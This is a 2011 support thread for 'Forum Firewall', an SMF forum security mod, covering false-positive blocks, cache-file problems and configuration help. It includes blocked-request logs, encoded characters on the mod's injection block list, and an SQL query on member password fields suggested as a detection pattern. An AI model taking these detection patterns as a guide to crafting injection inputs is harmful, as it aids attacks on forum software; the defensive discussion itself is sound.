Google has no business snooping in the sources directory.  Anyone snooping there is trying to read and/or modify the heart of SMF.  No one outside of the admin should be able to see that directory.  Any outside attempts by anyone but yourself should be blocked.  Once you make the changes I requested in robots.txt (if there is something you can do at the google webmaster site please advise) google should stop or be blocked.  Honestly as a security specialist my motto is:  Trust no one even google!   :laugh:   O:)

Quote from: Glasso on March 05, 2011, 10:43:35 AM
Butchs, this is causing some genuine googlebot requests to be blocked as I see in my webmaster logs. I can send you some trail that I had with Michael where he thought roundtripdns is not fully reliable, if you believe it is worthwhile to go deeper.

That could have been avoided.  Not to be rude but please do not make a negative statement unless you have read and understand all the help "?" icons.  This question will be answered to it its correct place:  BB forum (http://www.simplemachines.org/community/index.php?topic=375980.0).
8)
Title: Re: Forum Firewall
Post by: Glasso on March 05, 2011, 02:20:26 PM
Quote from: Glasso on March 05, 2011, 10:43:35 AM
Butchs, this is causing some genuine googlebot requests to be blocked as I see in my webmaster logs. I can send you some trail that I had with Michael where he thought roundtripdns is not fully reliable, if you believe it is worthwhile to go deeper.
Quote
That could have been avoided.  Not to be rude but please do not make a negative statement unless you have read and understand all the help "?" icons.  This question will be answered to it its correct place:  BB forum (http://www.simplemachines.org/community/index.php?topic=375980.0).
8)
Sorry, I honestly do not realize what you saw as a negative comment, but that was certainly not my intention. I will respond to you further on the BB topic. Thanks.
Title: Re: Forum Firewall
Post by: butchs on March 05, 2011, 02:25:21 PM
Understood.  I am just making sure people do not get the wrong impression.
:)
Title: Re: Forum Firewall
Post by: wickedgood on March 07, 2011, 03:28:47 PM
I installed this mod and it works really good................too good ;D

Got many emails from members who were getting blocked. I whitelisted members in Permissions but still many getting blocked.

I honestly don't know what all the values in the settings mean. Before I start messing with those...........Is there a way to tone it down?

Don't mind changing the settings but I could use some recommendations on something like a low, medium and high setting?

Appreciate all the hard work you put into this project.
Title: Re: Forum Firewall
Post by: butchs on March 07, 2011, 07:12:37 PM
You should run it for a few days with blocking disabled to prevent that issue.  White list only protects against false dos attacks.

uncheck "Block Violations"

check the following:
"Enable Testing"
"Logging"
"User-Agent Inspection"
"DOS Attack"
"Enable IP Validation"

everything else should be unchecked.  Watch the log and make sure members are not getting blocked before you enable blocking.
Title: Re: Forum Firewall
Post by: wickedgood on March 07, 2011, 08:29:36 PM
I did that? Its still running in analysis mode. 

Didn't notice any members getting blocked before I enabled blocking? Also seemed to block Google, and some other "good" bots. At least that's what it showed?

If I do notice a member getting blocked what can I do to unblock them?
Title: Re: Forum Firewall
Post by: Jesna on March 09, 2011, 12:26:45 PM
Im thinking of using the country test but im not sure about those country codes i have to fill in. Can I use the country codes from here http://countrycode.org/

example: South africa is ZA / ZAF and then i put ZA / ZAF in the field

/Jakob
Title: Re: Forum Firewall
Post by: TheMortician4 on March 09, 2011, 02:47:32 PM
I am running SMF 1.1.13, simple Protal 2.3.3, and Emulation drop down to use the Email Validator.


Is this mod compatible with my system?
Title: Re: Forum Firewall
Post by: Bigguy on March 09, 2011, 04:16:32 PM
As far as I know it is. :)
Title: Re: Forum Firewall
Post by: TheMortician4 on March 09, 2011, 05:05:09 PM
no coding necessary? I am using Godaddy
Title: Re: Forum Firewall
Post by: Bigguy on March 09, 2011, 05:16:01 PM
Not that I know of.
Title: Re: Forum Firewall
Post by: busterone on March 09, 2011, 05:18:08 PM
It should install on 1.1.13 with no edits required. It is listed as 1.1.13 compatible on the mod's download page.
Title: Re: Forum Firewall
Post by: Kindred on March 09, 2011, 06:11:41 PM
that, of course, depends on whether you have any mod which conflicts with the code changes that this one makes....
Title: Re: Forum Firewall
Post by: butchs on March 09, 2011, 06:40:08 PM
wickedgood,
I will need more information to help you.  Maybe you will like to try reviewing some of the past questions in this thread? ???
Title: Re: Forum Firewall
Post by: butchs on March 09, 2011, 06:43:55 PM
Quote from: Jesna on March 09, 2011, 12:26:45 PM
Im thinking of using the country test but im not sure about those country codes i have to fill in. Can I use the country codes from here http://countrycode.org/

example: South africa is ZA / ZAF and then i put ZA / ZAF in the field

The country code feature for this mod is limited.  It may not work with every system.  Please test before enabling it live.

But if it does work simply use the two letters like "ZA" for "South africa" in the field.  Do not forget "|" between the two letters. ie "ZA|ZM|ZW"
:)
Title: Re: Forum Firewall
Post by: butchs on March 09, 2011, 06:45:38 PM
Quote from: TheMortician4 on March 09, 2011, 02:47:32 PM
I am running SMF 1.1.13...

The mod works with SMF 1.1.x13.
:D
Title: Re: Forum Firewall
Post by: TheMortician4 on March 09, 2011, 07:02:28 PM
awesome will set it up tonight
Title: Re: Forum Firewall
Post by: ljunatic on March 09, 2011, 09:29:16 PM
butchs,
Here is a log from a legitimate member, and the action was that he registered to my forum and then returned to verify the email account used.  #55 is another association's registration confirmation page on my Joomla site that links to my SMF forum registration. #56 is the registration request to my forum. #57 is the verification of the email address used when registering. (This is a 1.1.13 smf site)

Can someone point out to me the parts of the log that indicate a Hack attempt? 

I am hesitant to turn on blocking if it will stop valid registrations. Can I modify a setting to prevent this issue? All my forum registrations must be approved, and then activated via email verification


57   75.135.29.164    2011-03-08 19:04:04    GET /forum/index.php?action=verificationcode;rand=xxxxxxxxxxxxxxxxxxxxxxxxx HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SearchToolbar 1.2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729) http://www.nebraskafirepower.com/forum/index.php?action=register    Hack: Repeated!

56    75.135.29.164    2011-03-08 19:04:01    GET /forum/index.php?action=register HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SearchToolbar 1.2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729) http://www.nebraskafirepower.com/forum/index.php?action=register%22    Hack: Repeated!

55    75.135.29.164    2011-03-08 19:03:44    GET /forum/index.php?action=register%22 HTTP/1.1 Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB6.6; SearchToolbar 1.2; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET4.0C; .NET CLR 3.0.30729) http://nefirearm.com/index.php?option=com_content&view=article&id=11&Itemid=25    Hack: %22!
Title: Re: Forum Firewall
Post by: butchs on March 10, 2011, 08:02:48 PM
Here is the problem "Hack: %22!"  Where your member entered "%22" and was caught by the "Injection List" while logging on.  That is not normal.

The mod can be edited if you so desire.
Title: Re: Forum Firewall
Post by: ljunatic on March 10, 2011, 10:40:24 PM
I Thought that might be it , but that string  was not entered by the member, it was generated by the forum when the link was clicked.


here is a log that was saved when I tried to register from my laptop...

   76.84.105.198    2011-03-09 21:32:00    GET /forum/index.php?action=register%22 HTTP/1.1 Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 ( .NET CLR 3.5.30729; .NET4.0C) http://www.simplemachines.org/community/index.php?topic=417490.msg2983217    Hack: %22!


Not sure about the source, but it is being generated by my SMF registration


ETA I will edit the SQL injection list for now,

Thanks again
Title: Re: Forum Firewall
Post by: ljunatic on March 11, 2011, 10:19:06 PM
Hmmmm...default theme is the only one loaded.

I am just about to go live on my upgrade to 2.0 rc5, so it may not be worth the effort to fix this. :-\
Title: Re: Forum Firewall
Post by: busterone on March 11, 2011, 10:50:44 PM
Maybe the upgrade will repair it. The default theme is replaced during the upgrade.
Title: Re: Forum Firewall
Post by: Xarcell on March 12, 2011, 02:02:35 AM
this mod looks good, but I'm afraid I'll break my site with it, lol.
Title: Re: Forum Firewall
Post by: butchs on March 12, 2011, 06:47:12 AM
If it ain't broke don't fix it.  One less support question for me.  :)
Title: Re: Forum Firewall
Post by: Xarcell on March 12, 2011, 10:28:11 AM
Quote from: butchs on March 12, 2011, 06:47:12 AM
If it ain't broke don't fix it.  One less support question for me.  :)

lol...
Title: Re: Forum Firewall
Post by: butchs on March 12, 2011, 03:21:36 PM
Quote from: ljunatic on March 10, 2011, 10:40:24 PM
I Thought that might be it , but that string  was not entered by the member, it was generated by the forum when the link was clicked.

Who knows, your site could have been compromised for years?

The mod does not generate any extra code it simply looks at the incoming traffic.  So it seems to me that a wipe out and full install is in order.   :(
Title: Re: Forum Firewall
Post by: Xarcell on March 13, 2011, 01:18:09 PM
I have a feature request, but I reckon it's not likely.

In the past I've had malicious characters manually register on my site and put scrap in there signatures, try to upload avatars with scripts in it, etc etc.

So my request is to have an option to prune members with 0 posts after a set number of days(like 30 or 365).

I know it's not a major security thing, but I thought I would ask.
Title: Re: Forum Firewall
Post by: Kindred on March 13, 2011, 01:19:18 PM
You can already do that sort of thing in SMF core
Title: Re: Forum Firewall
Post by: TheMortician4 on March 13, 2011, 03:39:57 PM
Quote from: Kindred on March 13, 2011, 01:19:18 PM
You can already do that sort of thing in SMF core
\
How?
Title: Re: Forum Firewall
Post by: Bigguy on March 13, 2011, 04:16:23 PM
Go to your forum maintenance and then to members.
Title: Re: Forum Firewall
Post by: Xarcell on March 13, 2011, 06:23:36 PM
Quote from: Kindred on March 13, 2011, 01:19:18 PM
You can already do that sort of thing in SMF core

I didn't see it at first, but I see it now. Thanks.
Title: Re: Forum Firewall
Post by: RvG on March 14, 2011, 11:28:44 AM
Quote from: Arantor on March 11, 2011, 02:51:59 AM
It implies there's something wrong with your theme if it has extra " characters in it.

I am afraid I am having this problem, crip blackrain's theme.
Title: Re: Forum Firewall
Post by: busterone on March 14, 2011, 05:23:20 PM
Crip made several versions of Black Rain. It may be better to go to the correct topic for that particular variant.
Title: Re: Forum Firewall
Post by: TheMortician4 on March 15, 2011, 04:20:31 PM
Quote from: Bigguy on March 13, 2011, 04:16:23 PM
Go to your forum maintenance and then to members.

Could you be a little more definitive on how?
Title: Re: Forum Firewall
Post by: butchs on March 15, 2011, 07:27:42 PM
Off topic.
Title: Re: Forum Firewall
Post by: Bigguy on March 16, 2011, 10:55:22 AM
Go to Admin, then to maintenance, then to forum maintenance, then to members. :) At eh bottom you can prune the members.
Title: Re: Forum Firewall
Post by: KTT Robot on March 23, 2011, 03:48:40 AM
So I installed this mod yesterday and uhh.....

http://cl.ly/263y1c0n222S2z3Z3F1T

All in my server's ROOT directory... WTF? There's 6000 of them.

Uninstalling this mod immediately
Title: Re: Forum Firewall
Post by: busterone on March 23, 2011, 08:41:58 AM
That did not come from this mod. It looks as though they were already there, and you just noticed them.
Title: Re: Forum Firewall
Post by: KTT Robot on March 23, 2011, 09:11:08 AM
Quote from: busterone on March 23, 2011, 08:41:58 AM
That did not come from this mod. It looks as though they were already there, and you just noticed them.
Are you serious? Why do you so blatantly disregard any issues at all with this mod? I view the root directory of my server all of the time... in addition to this, they were called "ffirewall" and their creation date was after I installed the mod.

Jeez
Title: Re: Forum Firewall
Post by: KTT Robot on March 23, 2011, 09:19:14 AM
Quote from: Arantor on March 23, 2011, 09:13:05 AM
The files are created by the mod. Normally they'd be in the cache directory, which is why you wouldn't notice them, and they're there to actually reduce load on your system with the mod running.

The reason they don't show in your cache folder and instead in your root folder is because you don't have the cache set up correctly.
Where would I change the cache settings? SMF admin panel?

The cache dir in SMF is set as mysite.com/forum/cache
Title: Re: Forum Firewall
Post by: KTT Robot on March 23, 2011, 09:32:33 AM
Quote from: Arantor on March 23, 2011, 09:24:41 AM
Looks like a URL not a physical path to me..
It's set to the absolute path of my forum's cache dir, I just wasn't going to put the actual path, sorry for the confusion. I think the problem is with the mod. In the mod's code I found where cache files are saved:

$fh = @fopen($ffcachedir . '/data_' . $key . '.php', 'w');

I don't see $ffcachedir set anywhere.
Title: Re: Forum Firewall
Post by: butchs on March 23, 2011, 06:25:19 PM
Quote from: KTT Robot on March 23, 2011, 03:48:40 AM
http://cl.ly/263y1c0n222S2z3Z3F1T
Quote from: KTT Robot on March 23, 2011, 09:11:08 AM
Are you serious? Why do you so blatantly disregard any issues at all with this mod? I view the root directory of my server all of the time... in addition to this, they were called "ffirewall" and their creation date was after I installed the mod.

Because the mod works.  People like to blame others for human error.

The string you see in your directory is not from the mod.   FF cache files are shorter.

The strings you have look more like SMF default cache files.

Quote from: Arantor on March 23, 2011, 08:46:00 AM
More likely they were supposed to be in the cache directory and the cache directory is misconfigured.

The cache directory the mod uses is called "ffcache" and is installed in the SMF root directory with the mod.  Both cache directories (SMF & FF) are defined in "index.php".  They operate similarly.

Sorry KTT Robot but i do not think it is the mod.  It looks like you have another issue or your host has been compromised.
Title: Re: Forum Firewall
Post by: butchs on March 23, 2011, 06:34:52 PM
I edited the post just before you replied.  I mix up my mods...  Good grief do you live here?

index.php for SMF 2.x says:
// Make absolutely sure the cache directory is defined.
if ((empty($cachedir) || !file_exists($cachedir)) && file_exists($boarddir . '/cache'))
$cachedir = $boarddir . '/cache';
Title: Re: Forum Firewall
Post by: butchs on March 23, 2011, 06:42:49 PM
Where do you see data in this file name?

Quote from: KTT Robot on March 23, 2011, 03:48:40 AM
http://cl.ly/263y1c0n222S2z3Z3F1T

Title: Re: Forum Firewall
Post by: butchs on March 23, 2011, 06:58:27 PM
I thought the link was an example.  Glad you have the time to figure that riddle.

The mod did not fully install or botched manual installation would cause that.  Unzip a copy of the mod and try copying the "ffcache" directory and its contents from the unzipped file.  Make sure the permissions are the same as the SMF cache directory.
Title: Re: Forum Firewall
Post by: snoopy_virtual on March 23, 2011, 07:29:39 PM
Quote from: Arantor on March 23, 2011, 06:29:49 PM
And the SMF cache directory is defined in Settings.php not index.php ;)

That's with the normal SMF cache system.

For a reason unknown to me this mod uses its own cache system, totally different from the normal SMF one.
Title: Re: Forum Firewall
Post by: butchs on March 23, 2011, 07:55:51 PM
Naw, they get purged every day (for security reasons).  That is, when the mod is installed correctly.

SMF on the other hand does not purge cache.

The mod only uses anti-spoofing disk cache.  The other cache methods are not as reliable.  This is a security mod after-all...
Title: Re: Forum Firewall
Post by: KTT Robot on March 24, 2011, 12:39:55 PM
Quote from: butchs on March 23, 2011, 06:25:19 PM
Quote from: KTT Robot on March 23, 2011, 03:48:40 AM
http://cl.ly/263y1c0n222S2z3Z3F1T
Quote from: KTT Robot on March 23, 2011, 09:11:08 AM
Are you serious? Why do you so blatantly disregard any issues at all with this mod? I view the root directory of my server all of the time... in addition to this, they were called "ffirewall" and their creation date was after I installed the mod.

Because the mod works.  People like to blame others for human error.

The string you see in your directory is not from the mod.   FF cache files are shorter.

The strings you have look more like SMF default cache files.

Quote from: Arantor on March 23, 2011, 08:46:00 AM
More likely they were supposed to be in the cache directory and the cache directory is misconfigured.

The cache directory the mod uses is called "ffcache" and is installed in the SMF root directory with the mod.  Both cache directories (SMF & FF) are defined in "index.php".  They operate similarly.

Sorry KTT Robot but i do not think it is the mod.  It looks like you have another issue or your host has been compromised.
So what you're trying to tell me is that files such as /data_ffirewall-d0d2663e.php were not created by your mod, even though your mod contains this line code:

$fh = @fopen($ffcachedir . '/data_' . $key . '.php', 'w');

and also this one:

forumfirewall_cache_put_data('ffirewall-' . substr(hash($forumfirewall_algo,serialize($forumfirewall_ip.$modSettings['forumfirewall_salt'].$stamp)), -8), $cache_content, $forumfirewall_expire);

And even though the files did not exist before I installed the mod, started being created after I installed the mod, stopped being created after I uninstalled the mod, and contain the name of your mod in their filenames... you still insist that your mod had nothing to do with it?

I think you are delusional.

Anyway, I've completely removed the mod and I'm having no further issues.
Title: Re: Forum Firewall
Post by: butchs on March 24, 2011, 07:03:21 PM
This mod is not for newbies like you.

If you were capable of explaining what your issue was I would have been able to reply with an answer sooner.  Read post #338 and the one you commented on.  I gave you the solution to your issues and all you do is complain.

I spend much of my free time trying to support ungrateful nasty people like you.  This has proved to be an utter waste of my time.  Henceforth any cryptic newbie support requests like yours will be ignored.
Title: Re: Forum Firewall
Post by: butchs on March 24, 2011, 08:54:20 PM
Quote from: Arantor on March 23, 2011, 08:10:45 PM
Hmm, it was changed after August last year, I know that much, and the way clean_cache() was written also changed sometime after that date but I can't tell you exactly what changed without going through the SVN logs which I really can't be bothered to do right now - but it IS different.

Why do you post so much in this support thread when you do not use the mod, SMF or know much about it?  All you are doing is confusing those who actually want support.
Title: Re: Forum Firewall
Post by: butchs on March 24, 2011, 09:01:16 PM
Could be but....  honorable intentions or not...  All you did was confuse "KTT Robot" so much he/ she could not find the support reply to his/ her issue once it was discovered.
Title: Re: Forum Firewall
Post by: butchs on March 24, 2011, 09:08:01 PM
And you did then you went off on a tangent.  When the person came looking for support returned they did not see it buried in the mess... you call helpful.

Just what I thought you were the one who tried to block my mod release.  That explains why you have been doing what you do.
Title: Re: Forum Firewall
Post by: butchs on March 24, 2011, 09:29:17 PM
Ok, I believe you.  I had to see if it was you.  3 friggin months!!  Apologies.

No ones perfect, it took me how many posts before you had to point out the picture.  Still, next time can we take our extra discussions elsewhere.  I do not mind talking about the faults of SMF caching and my other limited knowledge areas.  Just that this is the wrong spot.

Off topic rants are the reason the official support boards are at SMFHelper.
Title: Re: Forum Firewall
Post by: butchs on March 29, 2011, 10:24:03 AM
Quote from: KTT Robot on March 24, 2011, 12:39:55 PM
And even though the files did not exist before I installed the mod, started being created after I installed the mod, stopped being created after I uninstalled the mod, and contain the name of your mod in their filenames... you still insist that your mod had nothing to do with it?

I reviewed the code and could not duplicate the claim.  I can only assume that you incorrectly defined the $ffcachedir in the index.php file as per the mod script, server has safe mode restrictions or your server blocked the creation of the folder.  My initial assumption looks to be correct this seems to be a installation error to me.

The next version of the mod will have a "sanity check" that will throw an error if the cache folder does not exist.  This is low on my priorities since this check is not included in SMF cache code so the release will wait for something more substantial.
Title: Re: Forum Firewall
Post by: butchs on March 29, 2011, 01:37:47 PM
SMF does not send a warning in cache_get_data() or cache_put_data(), I know because I used the latest code as the starting point.  If it is elsewhere, that extra trivia pursuit info is no longer of interest.

This mod uses its own cache in both SMF 1.1 and 2.x so your second point adds confusion.  You tun off cache in this mod by setting "Cache Duration" to zero in the mods admin page.
Title: Re: Forum Firewall
Post by: butchs on March 29, 2011, 03:51:34 PM
I decided to move it to the FF admin panel for the same reason.

Quote from: Arantor on March 29, 2011, 02:25:00 PM
No, the warning isn't there, it's in startup...

It is not in index.php and/ or Load.php in SMF 2RC5 as you say.  The problem with your supposed help "in this thread" is that it is confusing and sometimes riddled with misinformation.  If I wanted coding help, I would have posted in "SMF Coding Discussion".
Title: Re: Forum Firewall
Post by: Xarcell on March 30, 2011, 09:03:17 PM
This mod seems awesome, and I can't wait for the next release.
Title: Re: Forum Firewall
Post by: butchs on April 04, 2011, 08:01:44 PM
The mod is working well.  So I am working on something to make another version worth while.  I have been testing a better way to handle the language files so that translations for the SMF 1.1.x version will be just like SMF 2.x version.  The fist translated language will be spanish.
8)
Title: Re: Forum Firewall
Post by: Bagheera on April 06, 2011, 06:51:50 PM
Not sure whats that all about but I thought you would like to see it.
The first image is the last two firewall logs.
But today I got in the forum logs errors from forumfirewall.php please look at the second image.
I am using the firewall 1.0.0 on SMF2 RC4.
Title: Re: Forum Firewall
Post by: Bagheera on April 06, 2011, 06:53:26 PM
Btw that is a spammer ip in the second image  :)
Title: Re: Forum Firewall
Post by: butchs on April 06, 2011, 08:48:26 PM
The first image is being blocked because they %5b which is in the "Injection List".  This visitor is being bad.

Not sure what to make of the second visitor.  The error only says that "host" is not part of the referrer.  Odd...  I will try to stop it from happening in the next release.

Still a closer look at what this ip is doing may be in order.  CrawlTrack (http://www.crawltrack.net/) is a nice tool for that kind of stuff.

Title: Re: Forum Firewall
Post by: busterone on April 06, 2011, 09:09:16 PM
I get that same undefined error occasionally.  This is the line from forumfirewall.php that kicks it out once in a while, although I couldn't say why.
line 279- if($referer_parts['host'] != forumfirewall_get_env('HTTP_HOST')) {

I don't get it but a few times a day, so I have been deleting them and continue on.
Title: Re: Forum Firewall
Post by: Bagheera on April 07, 2011, 06:57:58 AM
Quote from: butchs on April 06, 2011, 08:48:26 PM
The first image is being blocked because they %5b which is in the "Injection List".  This visitor is being bad.

Not sure what to make of the second visitor.  The error only says that "host" is not part of the referrer.  Odd...  I will try to stop it from happening in the next release.

Still a closer look at what this ip is doing may be in order.  CrawlTrack (http://www.crawltrack.net/) is a nice tool for that kind of stuff.

Thank you for the info.
CrawlTrack looks like nice toll to have. I'll install it and see.  :D
Title: Re: Forum Firewall
Post by: butchs on April 07, 2011, 07:59:37 PM
Quote from: busterone on April 06, 2011, 09:09:16 PM
I get that same undefined error occasionally.  This is the line from forumfirewall.php that kicks it out once in a while, although I couldn't say why.
line 279-

I noticed that it could be handled better.  I will change how that part is handled in the next version (coming as soon as I have time to test it).
;)
Title: Re: Forum Firewall
Post by: busterone on April 07, 2011, 08:03:42 PM
Cool. No problem with it as is until then.  :)
Title: Re: Forum Firewall
Post by: alexandervba on April 08, 2011, 07:05:32 PM
Hello. Ive installed this mod today on my forum, its been on for about 6 hours now and yet I have 264 PAGES of bad visitors. Forum has about 21k registered users.

Im hoping someone can tell me what the following "hacking attempts" mean, and maybe tell me what i can do best to protect myself against them?

(http://www.foe-rs.com/firewall.png)

Theres also so many options in the firewall, i enabled a lot of them, I dont know what most of them do to be honoust xP... But when I enabled block visitors, a load of my members community were having problems, mainly this error:

QuoteTheres a few topics that I get the error message but that's about it.

HTTP Error 403 Forbidden

You don't have permission to access

/forums/members-board/(foe)-~-spring-awards-2011-~-(foe)/ on this server.

Your computer may be infected with a virus or a trojan. The Firewall has determined that you: Hacking attempt has been blocked!

If you get this message in error, please contact the ADM1N and provide the date and time of this message.

I really want to be safe, because a few days ago someone managed to get ACP access on our forums by bruteforcing an admin, and it had real bad consequences, so if this firewall is actually good, and works good and you can proof it, u can expect a donation from me.
Title: Re: Forum Firewall
Post by: butchs on April 08, 2011, 07:48:28 PM
Read the about in the mod admin page for some more security ideas.

Though your blocks look like attacks you should set up your site for robots to prevent accidental blocks.  See reply 102 (http://www.simplemachines.org/community/index.php?topic=417490.msg2925498#msg2925498).

Quote from: alexandervba on April 08, 2011, 07:05:32 PM
Theres also so many options in the firewall, i enabled a lot of them, I dont know what most of them do to be honoust xP... But when I enabled block visitors, a load of my members community were having problems, mainly this error

You should not enable blocking until you get this fixed.

If you see "HTTP Error 403 Forbidden" you should look at the "result" column in the visitors log.  The warning pages does not provide details but the "result" column in the visitor log does.  The first attack is the one you want to see.  Repeated attacks do not provide details because the mod is trying to save bandwidth and memory.  The result provides enough information for you to find out why they were blocked.

Changes are you have something set up incorrectly or need to adjust some attack codes.

Click the helps "?" in your settings page for details.
Title: Re: Forum Firewall
Post by: butchs on April 08, 2011, 08:12:40 PM
New version today.  Undefined "host" error bug fix.  Defined cache folder better.  Improved language handling making translating much easier.  The mod now will automatically install Spanish if that is your language.  The read-me is in both Spanish and English.

Enjoy!  :o
Title: Re: Forum Firewall
Post by: Xarcell on April 08, 2011, 08:15:00 PM
Quote from: butchs on April 08, 2011, 08:12:40 PM
New version today.  Undefined "host" error bug fix.  Defined cache folder better.  Improved language handling making translating much easier.  The mod now will automatically install Spanish if that is your language.  The read-me is in both Spanish and English.

Enjoy!  :o

Thanks!
Title: Re: Forum Firewall
Post by: butchs on April 09, 2011, 09:10:21 AM
I re downloaded the package today with some minor read me text corrections and broke out the Spanish read me.
Title: Re: Forum Firewall
Post by: Storman™ on April 10, 2011, 03:54:28 PM
Note that in the new version 1.0.10 (for 2.0) the "Installation Readme" is showing as version 1.0.9

Minor error but shows up at install time.

Cheers for update  ;)
Title: Re: Forum Firewall
Post by: butchs on April 10, 2011, 04:07:42 PM
Ooops, the about should have the correct version.  :)
Title: Re: Forum Firewall
Post by: alexandervba on April 11, 2011, 05:09:03 AM
Looking everywhere i can never find a result of any 'hacks' :s

Any idea why?
Title: Re: Forum Firewall
Post by: butchs on April 11, 2011, 05:24:40 AM
Look at the first occurrence in the visitor log under the result column.  Click on the numbers up top to move to older fields.
Title: Re: Forum Firewall
Post by: butchs on April 17, 2011, 08:40:00 AM
Quote from: DoctorMalboro on January 16, 2011, 09:19:22 AM
I mean if it does too many queries to the database... you know, some mods can be heavy and eat a lot of resources... that's what i'm asking.

I just noticed I never answered this question.

This is nothing but a rumor.

The mod does not use database queries to do the tests.  Instead it uses arrays that are stored in memory and checks the ip addresses via disk cache.  The cache can be turned on or off and automatically clears it's self.

The mod uses the cache to check repeat visitors to ban them before any tests are made and to limit the tests they get when they return during the cache duration.

Memory management and speed was a priority in creating this mod. This mod takes care to delete excess memory resources.  The code is designed with speed in mind.  Great effort has been put in speed. It is my opinion that "database queries" slow things down so I limited their use.

There are only three instances when database queries are used.  First when you are using the Whitelist.   Second when a bad visitor is found and logging is enabled.  The third is when auto-Banning is selected.  The mod WILL block visitors with logging disabled and blocking enabled.

So if you disable logging, Longterm Ban and do not use Whitelist there should be NO database queries and you still can BLOCK visitors.
Title: Re: Forum Firewall
Post by: qtime on April 17, 2011, 11:58:17 AM
Is there a way to monitor certain queries, like:
SELECT passwd, ID_MEMBER, ID_GROUP, lngfile, is_activated, emailAddress, additionalGroups, memberName, passwordSalt FROM form_members WHERE emailAddress
Title: Re: Forum Firewall
Post by: butchs on April 17, 2011, 02:50:54 PM
Yes, enter it in the admin configurable fields.  Read the built in help for more info.
Title: Re: Forum Firewall
Post by: qtime on April 17, 2011, 10:30:42 PM
Quote from: butchs on April 17, 2011, 02:50:54 PM
Yes, enter it in the admin configurable fields.  Read the built in help for more info.
thanks for reply, I know the admin panel options, but was wondering in which box it should be added.
Title: Re: Forum Firewall
Post by: butchs on April 18, 2011, 05:54:37 PM
Quote from: qtime on April 17, 2011, 10:30:42 PM
thanks for reply, I know the admin panel options, but was wondering in which box it should be added.

I would add a query to the Injection List.  Codes must be entered in the format of "XX|YY" where XX and YY are the Attack Codes.  ie SELECT passwd|ID_MEMBER|ID_GROUP|lngfile|is_activated|emailAddress|additionalGroups|memberName|passwordSalt FROM form_members WHERE emailAddress

Interesting, is this information you found from attacks?
Title: Re: Forum Firewall
Post by: qtime on April 19, 2011, 03:17:14 AM
ah thanks a lot, now I understand the XX|YY
Title: Re: Forum Firewall
Post by: DarkBlizz on April 22, 2011, 12:41:20 PM
outa curiousity why is the link "Protected by Forum Firewall" linked to http://www.eastcoastrollingthunder.com o.O??
Title: Re: Forum Firewall
Post by: butchs on April 22, 2011, 06:03:06 PM
You can remove it, look at the Forum Firewall about for more info on how to do it.

Title: Re: Forum Firewall
Post by: NanoSector on April 23, 2011, 02:46:09 PM
Quote from: DarkBlizz on April 22, 2011, 12:41:20 PM
outa curiousity why is the link "Protected by Forum Firewall" linked to http://www.eastcoastrollingthunder.com o.O??
And why the heck is that site blocking me? I hate those sites -.-''

Gotta protect my site with this bad boy :P
Title: Re: Forum Firewall
Post by: butchs on April 23, 2011, 03:08:51 PM
Ooops...  Its just a Car Club site.  I blocked many non-USA countries with the mod using the "Country Identification" feature.
Title: Re: Forum Firewall
Post by: Storman™ on April 30, 2011, 11:48:34 AM
Hi butchs

Got a problem with FF blocking Aeva   :-\

It's a new RC5 site and only running in test mode at the moment so not a big deal, but I'm getting these as attempted hacks when they are not:

Reason: Hack: Repeated!

QuoteGET /index.php?action=media;sa=album;in=6 HTTP/1.1 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 http://www.mysite.com/index.php?action=media;sa=mass;album=6

--------------------------------

Reason: Hack: Repeated!

QuoteGET /index.php?action=media;sa=media;in=12;preview HTTP/1.1 Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.2.16) Gecko/20110319 Firefox/3.6.16 http://www.mysite.com/index.php?action=media;sa=album;in=6

--------------------------------

Reason: Hack: %3d!

QuotePOSTFilename: my_image.jpg Upload: Submit Query /index.php?action=media;sa=mass;album=6;xml;upcook=YTo0OntpOjA7czoxOiI1IjtpOjE7czo0MDoiZjVjYjg4Y2I2YzAwZGUzMzk5MzFlMjFjNmJkY2EzZmZjODVmNGRiNSI7aToyO2k6MTQ5MzM4NTMyNztpOjM7aTowO30%3D HTTP/1.1 Shockwave Flash

Any idea on how to resolve so that these are not deemed to be attempted hacks ?

Basically all that was happening when I got the above was either uploading or previewing images in Aeva.

Cheers  ;)
Title: Re: Forum Firewall
Post by: butchs on May 01, 2011, 08:58:00 AM
The hack repeated is just your cache blocking it after the first attempt.  The mod does this to slow down spam bots.  You need to look at the first block in your visitor log to identify the root cause.  My guess is that
QuoteReason: Hack: %3d!
is the root cause of your issue.

Quote%3d
is the hexidecimal equivalent of
Quote=

This should not be in the code.  I can only assume that this is an isolated incident for the one flash link?  If so do not use that link.  If not, then it is just a typo in Aeva so you can either go to the Aeva support board and ask them to remove the trailing
Quote%3d
or you can remove it from the "Injection List".   Not recommend .   O:)

A little about Aeva.  First if you have the paid version I can not support it whit this mod. I had the free version at my site a while back and actually added some code to FF to make it work with Aeva.  But I was unhappy with how it worked so I removed Aeva and kept the workaround code in the mod.

With that said.  It is my opinion that Aeva makes way too may calls to the SMF core which actually slows down the site.  Do not get me wrong.  It is easy and works great but it sucks up way too much bandwidth for my old school tastes.  Support for Aeva with this mod is limited.
:-*
Title: Re: Forum Firewall
Post by: Kindred on May 01, 2011, 09:20:52 AM
hmmm....   just so you know, I have seen = be used in the sessionID string that is appended to urls.
Title: Re: Forum Firewall
Post by: butchs on May 01, 2011, 09:57:29 AM
= is not an issue it is only an issue if it is hex encoded as per RFC 3986.

To STRICTLY comply with RFC 3986 the links should be sanitized as follows:

from  => to
"%21" => "!"
"%2A" => "*"
"%27" => "`"
"%28" => "("
"%29" => ")"
"%3B" => ";"
"%3A" => ":"
"%40" => "@"
"%26" => "&"
"%3D" => "="
"%2B" => "+"
"%24" => "$"
"%2C" => ","
"%2F" => "/"
"%3F" => "?"
